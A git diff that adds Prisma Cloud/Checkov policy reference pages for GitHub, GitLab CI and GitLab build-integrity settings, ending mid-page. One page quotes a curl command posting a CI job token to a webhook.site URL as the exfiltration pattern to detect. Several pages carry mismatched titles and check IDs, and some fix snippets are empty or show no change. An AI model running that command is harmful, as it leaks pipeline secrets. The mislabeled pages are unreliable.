b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-status-checks.adoc new file mode 100644 index 000000000..f83657526 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-status-checks.adoc @@ -0,0 +1,33 @@ +== GitHub branch protection does not require status checks + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 13dc71bf-f21c-4cab-b593-71fdc1293de4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_status_checks_pr.py[CKV_GITHUB_14] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Requiring status checks means that all required CI jobs must pass for code to be merged. +This is especially important when your status checks include security reviews that must pass before merging the code. +This requirement can be found in the branch protection policies of your repository. diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-restricts-who-can-dismiss-pr-reviews-cis-115.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-restricts-who-can-dismiss-pr-reviews-cis-115.adoc new file mode 100644 index 000000000..3ebee8038 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-restricts-who-can-dismiss-pr-reviews-cis-115.adoc @@ -0,0 +1,34 @@ +== GitHub branch protection does not restrict who can dismiss a PR +// GitHub branch protection does not restrict who can dismiss a Pull Request (PR) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 549f1c63-1137-4dd5-8cd2-3a8a913b338c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/restrict_pr_review_dismissal.py[CKV_GITHUB_12] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Dismissing a pull request review allows you to dismiss irrelevant or outdated reviews. +However, this also allows blocking reviews to be dismissed. +Branch protection rules allow you to restrict who can dismiss reviews to a limited subset of users or teams. diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-does-not-allow-deletions.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-does-not-allow-deletions.adoc new file mode 100644 index 000000000..11eb34fcb --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-does-not-allow-deletions.adoc @@ -0,0 +1,33 @@ +== GitHub branch protection rules allow branch deletions + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3fc8cf08-de13-4692-a511-3f78d097e6e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/disallow_branch_deletions.py[CKV_GITHUB_18] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Protected branches are by default not able to be deleted. +This can be overridden from the branch protection rules, but should not be. +A human mistake can delete an important branch. diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-requires-linear-history.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-requires-linear-history.adoc new file mode 100644 index 000000000..1f0bafe11 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-requires-linear-history.adoc @@ -0,0 +1,35 @@ +== GitHub branch protection rules do not require linear history + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6d5d6f66-e407-4992-8073-136b0b04154e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_linear_history.py[CKV_GITHUB_8] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Ensure your team uses strictly linear history with squash merges and rebase merge to make development easier. +If your organization allows squash merge or rebase merge, then you can https://docs.github.com/en/repositories/configuring-branches-and-merges-in-your-repository/defining-the-mergeability-of-pull-requests/about-protected-branches#require-linear-history[enable linear history] from the branch protection menu. + + +//image::caefc3a-Screen_Shot_2022-08-19_at_5.14.45_PM.png diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-requires-signed-commits.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-requires-signed-commits.adoc new file mode 100644 index 000000000..710f9644a --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-requires-signed-commits.adoc @@ -0,0 +1,50 @@ +== GitHub merge requests should require at least 2 approvals + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 362c7490-7e2d-453b-b1f0-288c1eb059c2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/disallow_force_pushes.py[CKV_GITHUB_5] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +In GitHub, Branch Protection Rules define whether collaborators can delete or force push to the branch and set requirements for any pushes to the branch, such as passing status checks or a linear commit history. +When you enable required commit signing on a branch, contributors and bots can only push commits that have been signed and verified to the branch. +If a collaborator pushes an unsigned commit to a branch that requires commit signatures, the collaborator will need to rebase the commit to include a verified signature, then force push the rewritten commit to the branch. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* github_branch_protection, github_branch_protection_v3 +* *Attribute:* require_signed_commits + +[source,hcl] +---- +resource "github_branch_protection_v3" "example" { + +... +} +---- diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-and-repository-webhooks-are-using-https.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-and-repository-webhooks-are-using-https.adoc new file mode 100644 index 000000000..59c6c0a43 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-and-repository-webhooks-are-using-https.adoc @@ -0,0 +1,61 @@ +== GitHub repository webhooks do not use HTTPs +// GitHub repository webhooks do not use HTTPS protocol + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c6873d72-f7a6-43b7-ac45-ffcf21f77d80 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/webhooks_https_repos.py[CKV_GITHUB_7] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Webhooks can be configured to use endpoints of your choosing, including whether TLS is enabled or not. +Ensure you are using a webhook endpoint with encryption by using a standard HTTPS URL. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* github_repository_webhook +* *Attribute:* insecure_ssl + + +[source,go] +---- +{ + "resource "github_repository_webhook" "foo" { +... + configuration { +- url = "http://google.com/" ++ url = "https://google.com/" +- insecure_ssl = false ++ insecure_ssl = false + } + + +}", + +} +---- diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-has-ip-allow-list-enabled.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-has-ip-allow-list-enabled.adoc new file mode 100644 index 000000000..fa50eac59 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-has-ip-allow-list-enabled.adoc @@ -0,0 +1,51 @@ +== GitHub organization security settings do not have IP allow list enabled +// GitHub organization security settings 'IP allow list' not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7edea6c3-5984-426d-9e64-a4de1ab20395 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/ipallowlist.py[CKV_GITHUB_3] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +In GitHub Enterprise Cloud and GitHub AE, you can restrict access to organization assets by configuring an allow list for specific IP addresses. +For example, it is possible to allow access from only the IP address of a trusted CIDR. +The allow list for IP addresses will block access via the web, API, and Git from any IP addresses that are not on the allow list. + + +=== Fix - Buildtime + + + +*GitHub* + + + +. Go to your organization page on GitHub + +. Click on Settings and then Security + +. In the IP allowlist section, click on Enable IP allowlist + +. Add the IP addresses and ranges that you want to allow access to your organization's resources diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-require-2fa.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-require-2fa.adoc new file mode 100644 index 000000000..698de518c --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-require-2fa.adoc @@ -0,0 +1,47 @@ +== GitHub organization security settings do not include 2FA capability +// GitHub organization security settings not configured to require two-factor authentication (2FA) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3bc31e9c-5f8d-4f59-80db-779c2f88c5b3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/2fa.py[CKV_GITHUB_1] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Organization owners can require organization members, outside collaborators, and billing managers to enable two-factor authentication for their personal accounts, making it harder for malicious actors to access an organization's repositories and settings. + +=== Fix - Buildtime + + +*GitHub Enforce two-factor authentication:* + + + +. In the top right corner of GitHub.com, click your profile photo, then click Your organizations. + +. Next to the organization, click Settings. + +. In the "Security" section of the sidebar, click Authentication security. + +. Under "Authentication", select Require two-factor authentication for everyone in your organization, then click Save. diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-require-sso.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-require-sso.adoc new file mode 100644 index 000000000..3af3066bd --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-require-sso.adoc @@ -0,0 +1,65 @@ +== GitHub organization security settings do not include SSO +// GitHub organization security settings not configured to require SAML single sign on (SSO) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a2b09ba2-7ac2-4c00-b0a2-1913f11c0d79 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/sso.py[CKV_GITHUB_2] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Organization owners and admins can enforce SAML SSO so that all organization members must authenticate via an identity provider (IdP). +You can also enforce SAML SSO for your organization. +When you enforce SAML SSO, all members of the organization must authenticate through your IdP to access the organization's resources. +Enforcement removes any members and administrators who have not authenticated via your IdP from the organization. +GitHub sends an email notification to each removed user. + +=== Fix - Buildtime + + +*GitHub Enforce SAML SSO for your organization* + + + +. Enable and test SAML SSO for your organization, then authenticate with your IdP at least once. ++ +For more information, see "Enabling and testing SAML single sign-on for your organization." + +. Prepare to enforce SAML SSO for your organization. ++ +For more information, see "Preparing to enforce SAML single sign-on in your organization." + +. In the top right corner of GitHub.com, click your profile photo, then click Your organizations. ++ +Your organizations in the profile menu + +. Next to the organization, click Settings. + +. In the "Security" section of the sidebar, click Authentication security. + +. Under "SAML single sign-on", select Require SAML SSO authentication for all members of the + +. Under "Single sign-on recovery codes", review your recovery codes. ++ +Store the recovery codes in a safe location like a password manager. diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-webhooks-are-using-https.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-webhooks-are-using-https.adoc new file mode 100644 index 000000000..7e1040de7 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-webhooks-are-using-https.adoc @@ -0,0 +1,33 @@ +== GitHub organization webhooks do not use HTTPs +// GitHub organization webhooks do not use HTTPS protocol + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 781e9d63-f3da-4c74-b22c-b657c6d2dc3f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/webhooks_https_orgs.py[CKV_GITHUB_6] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Webhooks can be configured to use endpoints of your choosing, including whether TLS is enabled or not. +Ensure you are using a webhook endpoint with encryption by using a standard HTTPS URL. diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-repository-has-vulnerability-alerts-enabled.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-repository-has-vulnerability-alerts-enabled.adoc new file mode 100644 index 000000000..ab7109715 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-repository-has-vulnerability-alerts-enabled.adoc @@ -0,0 +1,50 @@ +== GitHub Repository doesn't have vulnerability alerts enabled +// GitHub Repository vulnerability alerts disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 51f91ec7-cc58-4c5c-9dfe-7eb5b581685e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py[CKV_GIT_3] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +GitHub has the ability to scan dependencies for vulnerabilities. +To enable this, you must also enable it at the owner level as well. +By default, this is enabled for public repos but not for private repos. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* github_repository +* *Attribute:* vulnerability_alerts + +[source,hcl] +---- +resource "github_repository" "example" { +} +---- + diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-repository-is-private.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-repository-is-private.adoc new file mode 100644 index 000000000..52da44faf --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-repository-is-private.adoc @@ -0,0 +1,45 @@ +== GitHub Repository is Public + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f620ff53-e5d6-45a1-b68b-83bc35f7e946 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/github/PrivateRepo.py[CKV_GIT_1] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + +=== Description + + +GitHub allows you to set a repository to private to prevent unauthorized users from viewing the repository. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* github_repository +* *Attribute:* private OR visibility (The visibility parameter overrides the private parameter) + +[source,go] +---- +resource "github_repository" "example" { + +... +or +} +---- diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/github-policies.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/github-policies.adoc new file mode 100644 index 000000000..7181d41d8 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/github-policies.adoc @@ -0,0 +1,103 @@ +== Github Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-2-admins-are-set-for-each-repository.adoc[GitHub repository has less than 2 admins] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/repository_collaborators.py[CKV_GITHUB_9] +|LOW + + +|xref:ensure-branch-protection-rules-are-enforced-on-administrators.adoc[GitHub branch protection rules are not enforced on administrators] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/enforce_branch_protection_admins.py[CKV_GITHUB_10] +|LOW + + +|xref:ensure-github-actions-secrets-are-encrypted.adoc[GitHub Actions Environment Secrets are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/github/SecretsEncrypted.py[CKV_GIT_4] +|HIGH + + +|xref:ensure-github-branch-protection-dismisses-stale-review-on-new-commit.adoc[GitHub branch protection does not dismiss stale reviews] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/dismiss_stale_reviews.py[CKV_GITHUB_11] +|LOW + + +|xref:ensure-github-branch-protection-requires-codeowner-reviews.adoc[GitHub branch protection does not require code owner reviews] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_code_owner_reviews.py[CKV_GITHUB_13] +|LOW + + +|xref:ensure-github-branch-protection-requires-conversation-resolution.adoc[GitHub branch protection does not require status checks] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_conversation_resolution.py[CKV_GITHUB_16] +|LOW + + +|xref:ensure-github-branch-protection-requires-push-restrictions.adoc[GitHub branch protection does not require push restrictions] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_push_restrictions.py[CKV_GITHUB_17] +|LOW + + +|xref:ensure-github-branch-protection-requires-status-checks.adoc[GitHub branch protection does not require status checks] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_status_checks_pr.py[CKV_GITHUB_14] +|LOW + + +|xref:ensure-github-branch-protection-restricts-who-can-dismiss-pr-reviews-cis-115.adoc[GitHub branch protection does not restrict who can dismiss a PR] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/restrict_pr_review_dismissal.py[CKV_GITHUB_12] +|LOW + + +|xref:ensure-github-branch-protection-rules-does-not-allow-deletions.adoc[GitHub branch protection rules allow branch deletions] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/disallow_branch_deletions.py[CKV_GITHUB_18] +|LOW + + +|xref:ensure-github-branch-protection-rules-requires-linear-history.adoc[GitHub branch protection rules do not require linear history] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_linear_history.py[CKV_GITHUB_8] +|LOW + + +|xref:ensure-github-branch-protection-rules-requires-signed-commits.adoc[GitHub merge requests should require at least 2 approvals] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/disallow_force_pushes.py[CKV_GITHUB_5] +|MEDIUM + + +|xref:ensure-github-organization-and-repository-webhooks-are-using-https.adoc[GitHub repository webhooks do not use HTTPs] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/webhooks_https_repos.py[CKV_GITHUB_7] +|MEDIUM + + +|xref:ensure-github-organization-security-settings-has-ip-allow-list-enabled.adoc[GitHub organization security settings do not have IP allow list enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/ipallowlist.py[CKV_GITHUB_3] +|LOW + + +|xref:ensure-github-organization-security-settings-require-2fa.adoc[GitHub organization security settings do not include 2FA capability] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/2fa.py[CKV_GITHUB_1] +|HIGH + + +|xref:ensure-github-organization-security-settings-require-sso.adoc[GitHub organization security settings do not include SSO] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/sso.py[CKV_GITHUB_2] +|HIGH + + +|xref:ensure-github-organization-webhooks-are-using-https.adoc[GitHub organization webhooks do not use HTTPs] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/webhooks_https_orgs.py[CKV_GITHUB_6] +|MEDIUM + + +|xref:ensure-github-repository-has-vulnerability-alerts-enabled.adoc[GitHub Repository doesn't have vulnerability alerts enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py[CKV_GIT_3] +|LOW + +|xref:merge-requests-should-require-at-least-2-approvals.adoc[GitHub merge requests should require at least 2 approvals] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/disallow_force_pushes.py[CKV_GITHUB_5] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/merge-requests-should-require-at-least-2-approvals.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/merge-requests-should-require-at-least-2-approvals.adoc new file mode 100644 index 000000000..323b2b023 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/merge-requests-should-require-at-least-2-approvals.adoc @@ -0,0 +1,55 @@ +== GitHub merge requests should require at least 2 approvals + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 362c7490-7e2d-453b-b1f0-288c1eb059c2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/disallow_force_pushes.py[CKV_GITHUB_5] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +In GitHub, repository administrators can require that all pull requests receive a specific number of approving reviews before someone merges the pull request into a protected branch. +It is also possible to require approving reviews from people with write permissions in the repository or from a designated code owner. +If a collaborator attempts to merge a pull request with pending or rejected reviews into the protected branch, the collaborator will receive an error message. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* github_branch_protection, github_branch_protection_v3 +* *Attribute:* required_approving_review_count + +[source,hcl] +---- +resource "github_branch_protection_v3" "example" { + +... +required_pull_request_reviews { + +... +} +} +---- + diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/avoid-creating-rules-that-generate-double-pipelines.adoc b/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/avoid-creating-rules-that-generate-double-pipelines.adoc new file mode 100644 index 000000000..4852407ae --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/avoid-creating-rules-that-generate-double-pipelines.adoc @@ -0,0 +1,50 @@ +== Rules used could create a double pipeline + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6f64c307-bf13-44ff-ab2c-5f66e36ec7ef + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/AvoidDoublePipelines.py[CKV_GITLABCI_2] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|GitLabCI + +|=== + + + +=== Description + + +The use of multiple trigger rules in a CI configuration file can lead to duplicate pipelines running. +For example, if there is a trigger for every push and a trigger for merge request events, both triggers could be true and thus create two pipelines. + + +*Example Fix* + +Try to keep the number of trigger sources down to one. + + +[source,yaml] +---- +planOnlySubset: + script: echo "This job creates double pipelines!" + rules: + - changes: + - $DOCKERFILES_DIR/* + - if: $CI_PIPELINE_SOURCE == "push" +- - if: $CI_PIPELINE_SOURCE == "merge_request_event" +---- + diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/gitlab-ci-policies.adoc b/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/gitlab-ci-policies.adoc new file mode 100644 index 000000000..6e9167407 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/gitlab-ci-policies.adoc @@ -0,0 +1,19 @@ +== Gitlab CI Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:avoid-creating-rules-that-generate-double-pipelines.adoc[Rules used could create a double pipeline] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/AvoidDoublePipelines.py[CKV_GITLABCI_2] +|LOW + + +|xref:suspicious-use-of-curl-with-ci-environment-variables-in-script.adoc[Suspicious use of curl in a GitLab CI environment] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py[CKV_GITLABCI_1] +|LOW + + +|=== + diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/suspicious-use-of-curl-with-ci-environment-variables-in-script.adoc b/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/suspicious-use-of-curl-with-ci-environment-variables-in-script.adoc new file mode 100644 index 000000000..17b2bd982 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/suspicious-use-of-curl-with-ci-environment-variables-in-script.adoc @@ -0,0 +1,44 @@ +== Suspicious use of curl in a GitLab CI environment + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8e7ade8f-68c7-45b6-95f1-d319b59b9a43 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py[CKV_GITLABCI_1] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|GitLabCI + +|=== + + + +=== Description + + +Using curl with environment variables could be an attempt to exfiltrate secrets from a pipeline. +Investigate if the use of curl is appropriate and secure. + + +*Example Fix Block code and remove code that attempts to exfiltrate secrets.* + + +[source,yaml] +---- +deploy: +- script: 'curl -H \"Content-Type: application/json\" -X POST --data "$CI_JOB_JWT_V1" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826' +---- +---- +---- diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-all-gitlab-groups-require-two-factor-authentication.adoc b/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-all-gitlab-groups-require-two-factor-authentication.adoc new file mode 100644 index 000000000..5fe0e4654 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-all-gitlab-groups-require-two-factor-authentication.adoc @@ -0,0 +1,55 @@ +== Gitlab organization has groups with no two factor authentication configured +// Gitlab organization has groups that do not require two factor authentication (2FA) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ab197a5f-2a7e-4921-bdb9-202a27c8dc52 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/gitlab/checks/two_factor_authentication.py[CKV_GITLAB_2] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +In GitLab, 2FA provides an additional level of security to user accounts. +When enabled, users are prompted for a code generated by an application in addition to supplying their username and password to sign in. + +=== Fix - Buildtime + + +*GitLab Enable 2FA for all users:* + + + +. On the top bar, select *Menu > Admin*. + +. On the left sidebar, select *Settings > General* (/admin/application_settings/general). + +. Expand the *Sign-in restrictions* section, where you can configure both. + + +Enforce 2FA only for certain groups: + +. Go to the group's *Settings > General* page. + +. Expand the *Permissions and group features* section. + +. Select the *Require all users* in this group to set up two-factor authentication option. diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-branch-protection-rules-does-not-allow-force-pushes.adoc b/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-branch-protection-rules-does-not-allow-force-pushes.adoc new file mode 100644 index 000000000..dd3675603 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-branch-protection-rules-does-not-allow-force-pushes.adoc @@ -0,0 +1,60 @@ +== Gitlab branch protection rules allows force pushes + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7e633620-4449-47f6-8b20-42f125002d68 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/gitlab/checks/merge_requests_approvals.py[CKV_GITLAB_1] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +In GitLab, permissions are fundamentally defined around the idea of having read or write permission to the repository and branches. +To impose further restrictions on certain branches, they can be protected. +When you perform more complex operations, for example, squash commits, reset or rebase your branch, you must force an update to the remote branch. +These operations imply rewriting the commit history of the branch. +Forcing an update is not recommended when you're working on shared branches. +You can enable force push on a protected branch, but this is ill-advised. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* gitlab_branch_protection +* *Attribute:* allow_force_push + + +[source,go] +---- +{ + "resource "gitlab_branch_protection" "BranchProtect" { +... +- allow_force_push = true ++ allow_force_push = false +... +}", + +} +---- + diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-commits-are-signed.adoc b/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-commits-are-signed.adoc new file mode 100644 index 000000000..8fa795778 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-commits-are-signed.adoc @@ -0,0 +1,59 @@ +== Gitlab project commits are not signed +// Gitlab project commits not signed + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d2106a3f-81c8-4ee9-919b-b519dcedc59d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py[CKV_GLB_4] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +In GitLab, administrators can turn on the capability to require signed commits for a project. +When you enable required commit signing on a branch, contributors and bots can only push commits that have been signed and verified to the branch. +If a collaborator pushes an unsigned commit to a branch that requires commit signatures, the collaborator will need to rebase the commit to include a verified signature, then force push the rewritten commit to the branch. + +=== Fix - Buildtime + + +*Terraform* + + +* Resource: gitlab_project +* Attribute: prevent_secrets + + +[source,go] +---- +{ + "resource "gitlab_project" "example-two" { +... + push_rules { + ... ++ reject_unsigned_commits = true + } + +}", +} +---- + diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-prevent-secrets-is-enabled.adoc b/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-prevent-secrets-is-enabled.adoc new file mode 100644 index 000000000..981742e92 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-prevent-secrets-is-enabled.adoc @@ -0,0 +1,57 @@ +== Gitlab project does not prevent secrets +// Gitlab project does not prevent pushing secrets in merge requests + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 67e38511-5836-4eaa-8925-53b9e58cc567 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py[CKV_GLB_3] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +In GitLab, administrators can turn on the capability to identify and block secrets in merge requests (MR). + +=== Fix - Buildtime + + +*Terraform* + + +* Resource: gitlab_project +* 